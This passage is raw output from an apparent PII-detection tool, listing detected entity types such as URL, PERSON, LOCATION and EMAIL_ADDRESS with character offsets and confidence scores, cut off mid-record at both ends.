15101, end: 15107, score: 0.5, type: URL, start: 15163, end: 15173, score: 0.5, type: URL, start: 15187, end: 15193, score: 0.5, type: URL, start: 15246, end: 15266, score: 0.5, type: URL, start: 15288, end: 15293, score: 0.5, type: URL, start: 15308, end: 15313, score: 0.5, type: URL, start: 15574, end: 15583, score: 0.5, type: URL, start: 15633, end: 15642, score: 0.5, type: URL, start: 15651, end: 15661, score: 0.5, type: URL, start: 15702, end: 15712, score: 0.5, type: URL, start: 15746, end: 15756, score: 0.5, type: URL, start: 15778, end: 15787, score: 0.5, type: URL, start: 15794, end: 15804, score: 0.5, type: URL, start: 15833, end: 15852, score: 0.5, type: URL, start: 15881, end: 15891, score: 0.5, type: URL, start: 15906, end: 15916, score: 0.5, type: URL, start: 15937, end: 15947, score: 0.5, type: URL, start: 15958, end: 15968, score: 0.5, type: URL, start: 16004, end: 16014, score: 0.5, type: URL, start: 16036, end: 16045, score: 0.5, type: URL, start: 16057, end: 16067, score: 0.5, type: URL, start: 16124, end: 16134, score: 0.5, type: URL, start: 16290, end: 16299, score: 0.5, type: EMAIL_ADDRESS, start: 190, end: 205, score: 1.0, type: EMAIL_ADDRESS, start: 1177, end: 1192, score: 1.0, type: PERSON, start: 156, end: 174, score: 0.85, type: DATE_TIME, start: 455, end: 460, score: 0.85, type: PERSON, start: 603, end: 606, score: 0.85, type: PERSON, start: 612, end: 618, score: 0.85, type: LOCATION, start: 619, end: 632, score: 0.85, type: LOCATION, start: 633, end: 644, score: 0.85, type: PERSON, start: 791, end: 797, score: 0.85, type: PERSON, start: 914, end: 922, score: 0.85, type: PERSON, start: 1140, end: 1149, score: 0.85, type: PERSON, start: 1158, end: 1175, score: 0.85, type: PERSON, start: 1336, end: 1357, score: 0.85, type: DATE_TIME, start: 1918, end: 1925, score: 0.85, type: DATE_TIME, start: 1946, end: 1953, score: 0.85, type: PERSON, start: 2354, end: 2385, score: 0.85, type: URL, start: 196, end: 205, score: 0.5, type: URL, start: 527, end: 540, score: 0.5, type: URL, start: 698, end: 703, score: 0.5, type: URL, start: 737, end: 742, score: 0.5, type: URL, start: 973, end: 978, score: 0.5, type: URL, start: 1119, end: 1130, score: 0.5, type: URL, start: 1140, end: 1145, score: 0.5, type: URL, start: 1183, end: 1192, score: 0.5, type: URL, start: 1255, end: 1268, score: 0.5, type: URL, start: 1275, end: 1280, score: 0.5, type: URL, start: 1336, end: 1341, score: 0.5, type: URL, start: 1376, end: 1381, score: 0.5, type: URL, start: 1415, end: 1420, score: 0.5, type: URL, start: 1468, end: 1473, score: 0.5, type: URL, start: 1592, end: 1598, score: 0.5, type: URL, start: 1654, end: 1659, score: 0.5, type: URL, start: 1777, end: 1783, score: 0.5, type: URL, start: 1841, end: 1846, score: 0.5, type: URL, start: 1961, end: 1968, score: 0.5, type: URL, start: 2040, end: 2045, score: 0.5, type: URL, start: 2211, end: 2218, score: 0.5, type: URL, start: 2324, end: 2329, score: 0.5, type: URL, start: 2377, end: 2382, score: 0.5, type: EMAIL_ADDRESS, start: 94, end: 109, score: 1.0, type: EMAIL_ADDRESS, start: 133, end: 148, score: 1.0, type: PERSON, start: 81, end: 109, score: 0.85, type: PERSON, start: 112, end: 132, score: 0.85, type: DATE_TIME, start: 167, end: 171, score: 0.85, type: PERSON, start: 172, end: 184, score: 0.85, type: LOCATION, start: 1059, end: 1066, score: 0.85, type: PERSON, start: 1089, end: 1096, score: 0.85, type: LOCATION, start: 1432, end: 1439, score: 0.85, type: NRP, start: 2388, end: 2394, score: 0.85, type: LOCATION, start: 2454, end: 2461, score: 0.85, type: LOCATION, start: 2463, end: 2470, score: 0.85, type: NRP, start: 2490, end: 2498, score: 0.85, type: LOCATION, start: 2500, end: 2507, score: 0.85, type: URL, start: 4526, end: 4536, score: 0.85, type: URL, start: 4547, end: 4557, score: 0.85, type: URL, start: 4644, end: 4654, score: 0.85, type: URL, start: 4665, end: 4675, score: 0.85, type: LOCATION, start: 4716, end: 4735, score: 0.85, type: URL, start: 4721, end: 4725, score: 0.85, type: URL, start: 4757, end: 4767, score: 0.85, type: PERSON, start: 5661, end: 5665, score: 0.85, type: PERSON, start: 7353, end: 7367, score: 0.85, type: URL, start: 8096, end: 8103, score: 0.85, type: URL, start: 8339, end: 8343, score: 0.85, type: URL, start: 8854, end: 8858, score: 0.85, type: URL, start: 9571, end: 9578, score: 0.85, type: URL, start: 10174, end: 10178, score: 0.85, type: URL, start: 10471, end: 10475, score: 0.85, type: URL, start: 10529, end: 10533, score: 0.85, type: PERSON, start: 11507, end: 11522, score: 0.85, type: URL, start: 11627, end: 11638, score: 0.85, type: PERSON, start: 11652, end: 11664, score: 0.85, type: URL, start: 11776, end: 11787, score: 0.85, type: PERSON, start: 11805, end: 11809, score: 0.85, type: URL, start: 11826, end: 11833, score: 0.85, type: URL, start: 11878, end: 11889, score: 0.85, type: URL, start: 12121, end: 12132, score: 0.85, type: URL, start: 12846, end: 12853, score: 0.85, type: URL, start: 13359, end: 13370, score: 0.85, type: URL, start: 13395, end: 13412, score: 0.85, type: PERSON, start: 14212, end: 14216, score: 0.85, type: URL, start: 14233, end: 14240, score: 0.85, type: URL, start: 14641, end: 14647, score: 0.85, type: URL, start: 14792, end: 14799, score: 0.85, type: URL, start: 15315, end: 15321, score: 0.85, type: PERSON, start: 16209, end: 16222, score: 0.85, type: LOCATION, start: 16473, end: 16477, score: 0.85, type: LOCATION, start: 17510, end: 17529, score: 0.85, type: URL, start: 17515, end: 17519, score: 0.85, type: LOCATION, start: 17569, end: 17588, score: 0.85, type: URL, start: 17574, end: 17578, score: 0.85, type: URL, start: 17594, end: 17600, score: 0.85, type: PERSON, start: 17612, end: 17625, score: 0.85, type: URL, start: 17943, end: 17953, score: 0.85, type: LOCATION, start: 18463, end: 18473, score: 0.85, type: PERSON, start: 19836, end: 19853, score: 0.85, type: LOCATION, start: 19920, end: 19931, score: 0.85, type: LOCATION, start: 20675, end: 20686, score: 0.85, type: LOCATION, start: 21497, end: 21516, score: 0.85, type: URL, start: 21502, end: 21506, score: 0.85, type: LOCATION, start: 21652, end: 21671, score: 0.85, type: URL, start: 21657, end: 21661, score: 0.85, type: URL, start: 21677, end: 21683, score: 0.85, type: LOCATION, start: 22537, end: 22544, score: 0.85, type: PERSON, start: 25764, end: 25777, score: 0.85, type: LOCATION, start: 26621, end: 26640, score: 0.85, type: URL, start: 26626, end: 26630, score: 0.85, type: LOCATION, start: 27419, end: 27438, score: 0.85, type: PERSON, start: 27969, end: 27981, score: 0.85, type: LOCATION, start: 28110, end: 28129, score: 0.85, type: URL, start: 28115, end: 28119, score: 0.85, type: LOCATION, start: 28317, end: 28336, score: 0.85, type: URL, start: 28322, end: 28326, score: 0.85, type: URL, start: 28344, end: 28355, score: 0.85, type: PERSON, start: 28376, end: 28402, score: 0.85, type: LOCATION, start: 28536, end: 28555, score: 0.85, type: URL, start: 28541, end: 28545, score: 0.85, type: URL, start: 28683, end: 28693, score: 0.85, type: URL, start: 28705, end: 28711, score: 0.85, type: LOCATION, start: 28854, end: 28885, score: 0.85, type: PERSON, start: 29579, end: 29609, score: 0.85, type: PERSON, start: 29683, end: 29709, score: 0.85, type: LOCATION, start: 30024, end: 30044, score: 0.85, type: LOCATION, start: 30046, end: 30057, score: 0.85, type: LOCATION, start: 30161, end: 30180, score: 0.85, type: PERSON, start: 30450, end: 30462, score: 0.85, type: LOCATION, start: 30533, end: 30544, score: 0.85, type: LOCATION, start: 30676, end: 30695, score: 0.85, type: PERSON, start: 30742, end: 30767, score: 0.85, type: PERSON, start: 30788, end: 30801, score: 0.85, type: DATE_TIME, start: 31143, end: 31146, score: 0.85, type: LOCATION, start: 31401, end: 31420, score: 0.85, type: URL, start: 31406, end: 31410, score: 0.85, type: LOCATION, start: 31677, end: 31696, score: 0.85, type: URL, start: 31682, end: 31686, score: 0.85, type: LOCATION, start: 31865, end: 31884, score: 0.85, type: URL, start: 31870, end: 31874, score: 0.85, type: URL, start: 31890, end: 31896, score: 0.85, type: LOCATION, start: 32121, end: 32140, score: 0.85, type: URL, start: 32126, end: 32130, score: 0.85, type: URL, start: 32146, end: 32152, score: 0.85, type: PERSON, start: 32170, end: 32183, score: 0.85, type: LOCATION, start: 32698, end: 32717, score: 0.85, type: URL, start: 32703, end: 32707, score: 0.85, type: PERSON, start: 33009, end: 33028, score: 0.85, type: URL, start: 33148, end: 33155, score: 0.85, type: LOCATION, start: 34104, end: 34123, score: 0.85, type: URL, start: 34109, end: 34113, score: 0.85, type: URL, start: 34213, end: 34223, score: 0.85, type: LOCATION, start: 34313, end: 34332, score: 0.85, type: URL, start: 34318, end: 34322, score: 0.85, type: URL, start: 34338, end: 34344, score: 0.85, type: PERSON, start: 34366, end: 34379, score: 0.85, type: LOCATION, start: 34598, end: 34617, score: 0.85, type: URL, start: 34603, end: 34607, score: 0.85, type: LOCATION, start: 34909, end: 34928, score: 0.85, type: URL, start: 34914, end: 34918, score: 0.85, type: LOCATION, start: 35295, end: 35314, score: 0.85, type: URL, start: 35300, end: 35304, score: 0.85, type: LOCATION, start: 35753, end: 35772, score: 0.85, type: URL, start: 35758, end: 35762, score: 0.85, type: PERSON, start: 36435, end: 36476, score: 0.85, type: PERSON, start: 36755, end: 36774, score: 0.85, type: PERSON, start: 38508, end: 38527, score: 0.85, type: URL, start: 4873, end: 4907, score: 0.6, type: IP_ADDRESS, start: 38652, end: 38661, score: 0.6, type: URL, start: 100, end: 109, score: 0.5, type: URL, start: 139, end: 148, score: 0.5, type: URL, start: 2110, end: 2120, score: 0.5, type: URL, start: 2144, end: 2150, score: 0.5, type: URL, start: 2167, end: 2173, score: 0.5, type: URL, start: 2189, end: 2195, score: 0.5, type: URL, start: 2210, end: 2216, score: 0.5, type: URL, start: 2292, end: 2302, score: 0.5, type: URL, start: 2607, end: 2616, score: 0.5, type: URL, start: 2749, end: 2758, score: 0.5, type: URL, start: 2882, end: 2896, score: 0.5, type: URL, start: 2932, end: 2945, score: 0.5, type: URL, start: 2979, end: 2992, score: 0.5, type: URL, start: 3016, end: 3022, score: 0.5, type: URL, start: 3061, end: 3065, score: 0.5, type: URL, start: 3090, end: 3100, score: 0.5, type: URL, start: 3117, end: 3127, score: 0.5, type: URL, start: 3134, end: 3144, score: 0.5, type: URL, start: 3170, end: 3174, score: 0.5, type: URL, start: 3187, end: 3197, score: 0.5, type: URL, start: 3255, end: 3259, score: 0.5, type: URL, start: 3469, end: 3479, score: 0.5, type: URL, start: 3499, end: 3509, score: 0.5, type: URL, start: 3546, end: 3555, score: 0.5, type: URL, start: 3676, end: 3682, score: 0.5, type: URL, start: 4011, end: 4022, score: 0.5, type: URL, start: 4136, end: 4149, score: 0.5, type: URL, start: 4209, end: 4213, score: 0.5, type: URL, start: 4250, end: 4260, score: 0.5, type: URL, start: 4265, end: 4277, score: 0.5, type: URL, start: 4286, end: 4298, score: 0.5, type: URL, start: 4313, end: 4323, score: 0.5, type: URL, start: 4371, end: 4384, score: 0.5, type: URL, start: 4994, end: 5012, score: 0.5, type: URL, start: 5090, end: 5096, score: 0.5, type: URL, start: 5259, end: 5272, score: 0.5, type: URL, start: 5360, end: 5367, score: 0.5, type: URL, start: 7101, end: 7107, score: 0.5, type: URL, start: 7210, end: 7218, score: 0.5, type: URL, start: 7255, end: 7263, score: 0.5, type: URL, start: 7537, end: 7544, score: 0.5, type: URL, start: 7559, end: 7565, score: 0.5, type: URL, start: 7621, end: 7629, score: 0.5, type: URL, start: 7676, end: 7683, score: 0.5, type: URL, start: 7710, end: 7716, score: 0.5, type: URL, start: 7745, end: 7751, score: 0.5, type: URL, start: 7868, end: 7883, score: 0.5, type: URL, start: 7914, end: 7922, score: 0.5, type: URL, start: 7952, end: 7962, score: 0.5, type: URL, start: 7995, end: 8010, score: 0.5, type: URL, start: 8033, end: 8041, score: 0.5, type: URL, start: 8410, end: 8414, score: 0.5, type: URL, start: 8460, end: 8464, score: 0.5, type: URL, start: 8467, end: 8473, score: 0.5, type: URL, start: 8564, end: 8568, score: 0.5, type: URL, start: 8924, end: 8928, score: 0.5, type: URL, start: 8985, end: 8989, score: 0.5, type: URL, start: 9197, end: 9201, score: 0.5, type: URL, start: 9263, end: 9267, score: 0.5, type: URL, start: 9492, end: 9496, score: 0.5, type: URL, start: 10244, end: 10248, score: 0.5, type: URL, start: 10580, end: 10584, score: 0.5, type: URL, start: 10725, end: 10729, score: 0.5, type: URL, start: 10776, end: 10780, score: 0.5, type: URL, start: 10934, end: 10938, score: 0.5, type: URL, start: 10973, end: 10982, score: 0.5, type: URL, start: 11029, end: 11035, score: 0.5, type: URL, start: 11242, end: 11248, score: 0.5, type: URL, start: 11308, end: 11314, score: 0.5, type: URL, start: 11465, end: 11473, score: 0.5, type: URL, start: 11927, end: 11938, score: 0.5, type: URL, start: 11941, end: 11947, score: 0.5, type: URL, start: 12001, end: 12012, score: 0.5, type: URL, start: 12166, end: 12183, score: 0.5, type: URL, start: 12354, end: 12365, score: 0.5, type: URL, start: 12409, end: 12420, score: 0.5, type: URL, start: 12471, end: 12482, score: 0.5, type: URL, start: 12540, end: 12551, score: 0.5, type: URL, start: 12609, end: 12620, score: 0.5, type: URL, start: 13272, end: 13283, score: 0.5, type: URL, start: 13516, end: 13527, score: 0.5, type: URL, start: 13556, end: 13567, score: 0.5, type: URL, start: 13608, end: 13619, score: 0.5, type: URL, start: 13664, end: 13675, score: 0.5, type: URL, start: 13721, end: 13732, score: 0.5, type: URL, start: 13817, end: 13826, score: 0.5, type: URL, start: 13873, end: 13879, score: 0.5, type: URL, start: 13966, end: 13972, score: 0.5, type: URL, start: 14166, end: 14174, score: 0.5, type: URL, start: 14297, end: 14308, score: 0.5, type: URL, start: 14376, end: 14393, score: 0.5, type: URL, start: 14434, end: 14445, score: 0.5, type: URL, start: 15059, end: 15070, score: 0.5, type: URL, start: 15120, end: 15137, score: 0.5, type: URL, start: 15161, end: 15172, score: 0.5, type: URL, start: 15408, end: 15417, score: 0.5, type: URL, start: 15464, end: 15470, score: 0.5, type: URL, start: 15534, end: 15540, score: 0.5, type: URL, start: 15656, end: 15671, score: 0.5, type: URL, start: 15702, end: 15710, score: 0.5, type: URL, start: 15740, end: 15750, score: 0.5, type: URL, start: 15781, end: 15796, score: 0.5, type: URL, start: 15818, end: 15833, score: 0.5, type: URL, start: 15856, end: 15864, score: 0.5, type: URL, start: 15932, end: 15944, score: 0.5, type: URL, start: 15971, end: 15977, score: 0.5, type: URL, start: 16083, end: 16091, score: 0.5, type: URL, start: 16148, end: 16159, score: 0.5, type: URL, start: 16186, end: 16192, score: 0.5, type: URL, start: 16604, end: 16615, score: 0.5, type: URL, start: 16639, end: 16649, score: 0.5, type: URL, start: 16696, end: 16707, score: 0.5, type: URL, start: 16763, end: 16776, score: 0.5, type: URL, start: 16793, end: 16803, score: 0.5, type: URL, start: 16839, end: 16852, score: 0.5, type: URL, start: 16866, end: 16876, score: 0.5, type: URL, start: 17020, end: 17031, score: 0.5, type: URL, start: 17053, end: 17063, score: 0.5, type: URL, start: 17095, end: 17105, score: 0.5, type: URL, start: 17121, end: 17131, score: 0.5, type: URL, start: 17149, end: 17162, score: 0.5, type: URL, start: 17187, end: 17201, score: 0.5, type: URL, start: 17244, end: 17257, score: 0.5, type: URL, start: 17287, end: 17293, score: 0.5, type: URL, start: 17330, end: 17340, score: 0.5, type: URL, start: 17698, end: 17707, score: 0.5, type: URL, start: 17757, end: 17763, score: 0.5, type: URL, start: 17775, end: 17785, score: 0.5, type: URL, start: 17832, end: 17838, score: 0.5, type: URL, start: 17863, end: 17873, score: 0.5, type: URL, start: 17904, end: 17919, score: 0.5, type: URL, start: 18584, end: 18596, score: 0.5, type: URL, start: 19474, end: 19484, score: 0.5, type: URL, start: 19624, end: 19630, score: 0.5, type: URL, start: 19798, end: 19804, score: 0.5, type: URL, start: 19862, end: 19868, score: 0.5, type: URL, start: 20874, end: 20887, score: 0.5, type: URL, start: 20979, end: 20985, score: 0.5, type: URL, start: 21008, end: 21012, score: 0.5, type: URL, start: 21061, end: 21074, score: 0.5, type: URL, start: 21145, end: 21158, score: 0.5, type: URL, start: 21186, end: 21199, score: 0.5, type: URL, start: 21231, end: 21245, score: 0.5, type: URL, start: 21401, end: 21414, score: 0.5, type: URL, start: 21920, end: 21930, score: 0.5, type: URL, start: 21959, end: 21976, score: 0.5, type: URL, start: 22084, end: 22091, score: 0.5, type: URL, start: 22161, end: 22165, score: 0.5, type: URL, start: 22418, end: 22430, score: 0.5, type: URL, start: 22600, end: 22606, score: 0.5, type: URL, start: 22888, end: 22901, score: 0.5, type: URL, start: 23051, end: 23063, score: 0.5, type: URL, start: 23109, end: 23125, score: 0.5, type: URL, start: 23310, end: 23322, score: 0.5, type: URL, start: 23351, end: 23363, score: 0.5, type: URL, start: 23366, end: 23373, score: 0.5, type: URL, start: 23512, end: 23521, score: 0.5, type: URL, start: 24005, end: 24012, score: 0.5, type: URL, start: 24061, end: 24073, score: 0.5, type: URL, start: 24194, end: 24205, score: 0.5, type: URL, start: 24288, end: 24292, score: 0.5, type: URL, start: 24359, end: 24370, score: 0.5, type: URL, start: 24455, end: 24459, score: 0.5, type: URL, start: 24515, end: 24526, score: 0.5, type: URL, start: 24837, end: 24848, score: 0.5, type: URL, start: 24897, end: 24908, score: 0.5, type: URL, start: 25236, end: 25247, score: 0.5, type: URL, start: 25378, end: 25387, score: 0.5, type: URL, start: 25448, end: 25461, score: 0.5, type: URL, start: 25548, end: 25561, score: 0.5, type: URL, start: 25710, end: 25716, score: 0.5, type: URL, start: 25877, end: 25894, score: 0.5, type: URL, start: 26046, end: 26056, score: 0.5, type: URL, start: 26169, end: 26179, score: 0.5, type: URL, start: 26205, end: 26214, score: 0.5, type: URL, start: 26303, end: 26312, score: 0.5, type: URL, start: 26341, end: 26350, score: 0.5, type: URL, start: 26455, end: 26464, score: 0.5, type: URL, start: 26716, end: 26726, score: 0.5, type: URL, start: 26765, end: 26774, score: 0.5, type: URL, start: 26789, end: 26795, score: 0.5, type: URL, start: 26940, end: 26957, score: 0.5, type: URL, start: 27109, end: 27119, score: 0.5, type: URL, start: 27147, end: 27155, score: 0.5, type: URL, start: 27170, end: 27181, score: 0.5, type: URL, start: 27234, end: 27246, score: 0.5, type: URL, start: 27324, end: 27333, score: 0.5, type: URL, start: 27376, end: 27387, score: 0.5, type: URL, start: 27424, end: 27428, score: 0.5, type: URL, start: 27577, end: 27592, score: 0.5, type: URL, start: 27664, end: 27670, score: 0.5, type: URL, start: 27812, end: 27829, score: 0.5, type: URL, start: 27884, end: 27893, score: 0.5, type: URL, start: 27911, end: 27920, score: 0.5, type: URL, start: 27930, end: 27947, score: 0.5, type: URL, start: 28376, end: 28389, score: 0.5, type: URL, start: 28422, end: 28436, score: 0.5, type: URL, start: 28595, end: 28608, score: 0.5, type: URL, start: 28783, end: 28789, score: 0.5, type: URL, start: 28970, end: 28980, score: 0.5, type: URL, start: 29049, end: 29057, score: 0.5, type: URL, start: 29229, end: 29235, score: 0.5, type: URL, start: 29312, end: 29318, score: 0.5, type: URL, start: 29429, end: 29435, score: 0.5, type: URL, start: 29579, end: 29589, score: 0.5, type: URL, start: 29640, end: 29646, score: 0.5, type: URL, start: 30122, end: 30129, score: 0.5, type: URL, start: 30166, end: 30170, score: 0.5, type: URL, start: 30253, end: 30259, score: 0.5, type: URL, start: 30414, end: 30424, score: 0.5, type: URL, start: 30469, end: 30475, score: 0.5, type: URL, start: 30552, end: 30558, score: 0.5, type: URL, start: 30637, end: 30644, score: 0.5, type: URL, start: 30681, end: 30685, score: 0.5, type: URL, start: 30768, end: 30774, score: 0.5, type: URL, start: 30863, end: 30873, score: 0.5, type: URL, start: 30920, end: 30928, score: 0.5, type: URL, start: 30948, end: 30958, score: 0.5, type: URL, start: 30988, end: 30998, score: 0.5, type: URL, start: 31035, end: 31048, score: 0.5, type: URL, start: 31214, end: 31221, score: 0.5, type: URL, start: 31476, end: 31483, score: 0.5, type: URL, start: 31765, end: 31775, score: 0.5, type: URL, start: 31803, end: 31818, score: 0.5, type: URL, start: 32011, end: 32021, score: 0.5, type: URL, start: 32053, end: 32063, score: 0.5, type: URL, start: 32286, end: 32296, score: 0.5, type: URL, start: 32358, end: 32368, score: 0.5, type: URL, start: 32422, end: 32432, score: 0.5, type: URL, start: 32466, end: 32479, score: 0.5, type: URL, start: 32795, end: 32802, score: 0.5, type: URL, start: 33014, end: 33018, score: 0.5, type: URL, start: 33786, end: 33792, score: 0.5, type: URL, start: 34251, end: 34266, score: 0.5, type: URL, start: 34698, end: 34705, score: 0.5, type: URL, start: 34983, end: 34993, score: 0.5, type: URL, start: 35055, end: 35062, score: 0.5, type: URL, start: 35143, end: 35153, score: 0.5, type: URL, start: 35332, end: 35339, score: 0.5, type: URL, start: 35364, end: 35377, score: 0.5, type: URL, start: 35414, end: 35428, score: 0.5, type: URL, start: 35613, end: 35626, score: 0.5, type: URL, start: 35806, end: 35812, score: 0.5, type: URL, start: 35838, end: 35844, score: 0.5, type: URL, start: 35871, end: 35877, score: 0.5, type: URL, start: 36056, end: 36064, score: 0.5, type: URL, start: 36193, end: 36203, score: 0.5, type: URL, start: 36274, end: 36280, score: 0.5, type: URL, start: 36459, end: 36470, score: 0.5, type: URL, start: 36760, end: 36764, score: 0.5, type: URL, start: 36821, end: 36827, score: 0.5, type: URL, start: 36859, end: 36865, score: 0.5, type: URL, start: 36912, end: 36918, score: 0.5, type: URL, start: 37209, end: 37217, score: 0.5, type: URL, start: 37261, end: 37269, score: 0.5, type: URL, start: 37398, end: 37404, score: 0.5, type: URL, start: 37445, end: 37451, score: 0.5, type: URL, start: 37507, end: 37513, score: 0.5, type: URL, start: 37567, end: 37573, score: 0.5, type: URL, start: 37797, end: 37805, score: 0.5, type: URL, start: 37851, end: 37859, score: 0.5, type: URL, start: 37971, end: 37977, score: 0.5, type: URL, start: 38010, end: 38016, score: 0.5, type: URL, start: 38053, end: 38059, score: 0.5, type: URL, start: 38104, end: 38110, score: 0.5, type: URL, start: 38150, end: 38156, score: 0.5, type: URL, start: 38185, end: 38191, score: 0.5, type: URL, start: 38463, end: 38470, score: 0.5, type: URL, start: 38513, end: 38517, score: 0.5, type: URL, start: 38690, end: 38696, score: 0.5, type: URL, start: 38726, end: 38732, score: 0.5, type: URL, start: 38753, end: 38759, score: 0.5, type: EMAIL_ADDRESS, start: 34, end: 49, score: 1.0, type: NRP, start: 1554, end: 1570, score: 0.85, type: URL, start: 654, end: 682, score: 0.6, type: URL, start: 40, end: 49, score: 0.5, type: URL, start: 1016, end: 1023, score: 0.5, type: URL, start: 1036, end: 1043, score: 0.5, type: URL, start: 1063, end: 1070, score: 0.5, type: URL, start: 1086, end: 1093, score: 0.5, type: URL, start: 1354, end: 1361, score: 0.5, type: URL, start: 1402, end: 1409, score: 0.5, type: URL, start: 1456, end: 1463, score: 0.5, type: URL, start: 1522, end: 1529, score: 0.5, type: URL, start: 1572, end: 1579, score: 0.5, type: URL, start: 1642, end: 1649, score: 0.5, type: URL, start: 1675, end: 1682, score: 0.5, type: URL, start: 1691, end: 1698, score: 0.5, type: URL, start: 1702, end: 1713, score: 0.5, type: URL, start: 1736, end: 1743, score: 0.5, type: URL, start: 1758, end: 1765, score: 0.5, type: IP_ADDRESS, start: 29796, end: 29805, score: 0.95, type: IP_ADDRESS, start: 30204, end: 30213, score: 0.95, type: DATE_TIME, start: 19, end: 23, score: 0.85, type: DATE_TIME, start: 56, end: 60, score: 0.85, type: DATE_TIME, start: 97, end: 101, score: 0.85, type: PERSON, start: 102, end: 116, score: 0.85, type: LOCATION, start: 4498, end: 4506, score: 0.85, type: PERSON, start: 4884, end: 4899, score: 0.85, type: NRP, start: 4931, end: 4944, score: 0.85, type: PERSON, start: 5575, end: 5584, score: 0.85, type: PERSON, start: 5613, end: 5622, score: 0.85, type: NRP, start: 5679, end: 5688, score: 0.85, type: LOCATION, start: 7393, end: 7422, score: 0.85, type: PERSON, start: 9726, end: 9739, score: 0.85, type: PERSON, start: 10660, end: 10673, score: 0.85, type: PERSON, start: 11211, end: 11220, score: 0.85, type: PERSON, start: 11293, end: 11302, score: 0.85, type: NRP, start: 11401, end: 11410, score: 0.85, type: LOCATION, start: 12638, end: 12667, score: 0.85, type: LOCATION, start: 12802, end: 12809, score: 0.85, type: PERSON, start: 14924, end: 14933, score: 0.85, type: PERSON, start: 14962, end: 14971, score: 0.85, type: NRP, start: 15028, end: 15037, score: 0.85, type: LOCATION, start: 15915, end: 15944, score: 0.85, type: LOCATION, start: 16079, end: 16086, score: 0.85, type: PERSON, start: 17932, end: 17941, score: 0.85, type: PERSON, start: 17970, end: 17979, score: 0.85, type: NRP, start: 18036, end: 18045, score: 0.85, type: LOCATION, start: 19081, end: 19110, score: 0.85, type: LOCATION, start: 19245, end: 19252, score: 0.85, type: PERSON, start: 20030, end: 20063, score: 0.85, type: PERSON, start: 21539, end: 21548, score: 0.85, type: PERSON, start: 21577, end: 21586, score: 0.85, type: NRP, start: 21643, end: 21652, score: 0.85, type: LOCATION, start: 22741, end: 22770, score: 0.85, type: LOCATION, start: 22830, end: 22837, score: 0.85, type: PERSON, start: 24268, end: 24288, score: 0.85, type: PERSON, start: 24291, end: 24304, score: 0.85, type: PERSON, start: 24895, end: 24904, score: 0.85, type: PERSON, start: 24933, end: 24942, score: 0.85, type: NRP, start: 24999, end: 25008, score: 0.85, type: LOCATION, start: 26151, end: 26180, score: 0.85, type: URL, start: 26284, end: 26291, score: 0.85, type: URL, start: 26419, end: 26431, score: 0.85, type: LOCATION, start: 26450, end: 26457, score: 0.85, type: URL, start: 27522, end: 27529, score: 0.85, type: URL, start: 27562, end: 27569, score: 0.85, type: URL, start: 27587, end: 27594, score: 0.85, type: URL, start: 27661, end: 27670, score: 0.85, type: URL, start: 27718, end: 27725, score: 0.85, type: PERSON, start: 27766, end: 27779, score: 0.85, type: NRP, start: 28131, end: 28140, score: 0.85, type: LOCATION, start: 28729, end: 28758, score: 0.85, type: NRP, start: 29044, end: 29047, score: 0.85, type: PERSON, start: 29318, end: 29331, score: 0.85, type: PERSON, start: 29672, end: 29685, score: 0.85, type: PERSON, start: 30087, end: 30100, score: 0.85, type: PERSON, start: 30560, end: 30601, score: 0.85, type: PERSON, start: 30652, end: 30665, score: 0.85, type: PERSON, start: 31072, end: 31085, score: 0.85, type: PERSON, start: 31470, end: 31483, score: 0.85, type: PERSON, start: 31542, end: 31555, score: 0.85, type: PERSON, start: 31613, end: 31626, score: 0.85, type: PERSON, start: 31903, end: 31914, score: 0.85, type: PERSON, start: 33836, end: 33851, score: 0.85, type: NRP, start: 33883, end: 33896, score: 0.85, type: LOCATION, start: 34408, end: 34434, score: 0.85, type: LOCATION, start: 34436, end: 34443, score: 0.85, type: LOCATION, start: 35386, end: 35394, score: 0.85, type: PERSON, start: 35469, end: 35474, score: 0.85, type: URL, start: 35713, end: 35720, score: 0.85, type: LOCATION, start: 38658, end: 38685, score: 0.85, type: PERSON, start: 39096, end: 39109, score: 0.85, type: PERSON, start: 39151, end: 39164, score: 0.85, type: PERSON, start: 39534, end: 39547, score: 0.85, type: PERSON, start: 39933, end: 39946, score: 0.85, type: PERSON, start: 39997, end: 40010, score: 0.85, type: DATE_TIME, start: 40890, end: 40923, score: 0.85, type: LOCATION, start: 41783, end: 41812, score: 0.85, type: LOCATION, start: 42034, end: 42063, score: 0.85, type: LOCATION, start: 42193, end: 42201, score: 0.85, type: LOCATION, start: 42234, end: 42258, score: 0.85, type: PERSON, start: 42672, end: 42685, score: 0.85, type: PERSON, start: 42869, end: 42882, score: 0.85, type: PERSON, start: 43073, end: 43086, score: 0.85, type: LOCATION, start: 43514, end: 43526, score: 0.85, type: LOCATION, start: 43783, end: 43795, score: 0.85, type: LOCATION, start: 44383, end: 44395, score: 0.85, type: LOCATION, start: 44652, end: 44664, score: 0.85, type: PERSON, start: 45087, end: 45096, score: 0.85, type: LOCATION, start: 45659, end: 45671, score: 0.85, type: LOCATION, start: 45918, end: 45930, score: 0.85, type: PERSON, start: 46254, end: 46274, score: 0.85, type: PERSON, start: 46277, end: 46290, score: 0.85, type: URL, start: 46297, end: 46304, score: 0.85, type: PERSON, start: 46342, end: 46355, score: 0.85, type: URL, start: 46446, end: 46460, score: 0.85, type: PERSON, start: 46582, end: 46591, score: 0.85, type: LOCATION, start: 47172, end: 47184, score: 0.85, type: URL, start: 47488, end: 47495, score: 0.85, type: URL, start: 47505, end: 47512, score: 0.85, type: URL, start: 47515, end: 47521, score: 0.85, type: LOCATION, start: 47597, end: 47609, score: 0.85, type: URL, start: 47907, end: 47916, score: 0.85, type: URL, start: 47954, end: 47961, score: 0.85, type: PERSON, start: 47997, end: 48010, score: 0.85, type: LOCATION, start: 48052, end: 48060, score: 0.85, type: LOCATION, start: 48093, end: 48121, score: 0.85, type: LOCATION, start: 48582, end: 48594, score: 0.85, type: PERSON, start: 49238, end: 49254, score: 0.85, type: LOCATION, start: 50057, end: 50069, score: 0.85, type: PERSON, start: 50332, end: 50345, score: 0.85, type: PERSON, start: 50391, end: 50404, score: 0.85, type: LOCATION, start: 50447, end: 50455, score: 0.85, type: LOCATION, start: 50488, end: 50517, score: 0.85, type: LOCATION, start: 50673, end: 50682, score: 0.85, type: PERSON, start: 50859, end: 50875, score: 0.85, type: LOCATION, start: 51402, end: 51411, score: 0.85, type: PERSON, start: 51611, end: 51627, score: 0.85, type: LOCATION, start: 51974, end: 51983, score: 0.85, type: PERSON, start: 52185, end: 52201, score: 0.85, type: PERSON, start: 52585, end: 52598, score: 0.85, type: LOCATION, start: 52644, end: 52652, score: 0.85, type: LOCATION, start: 52685, end: 52717, score: 0.85, type: PERSON, start: 53198, end: 53211, score: 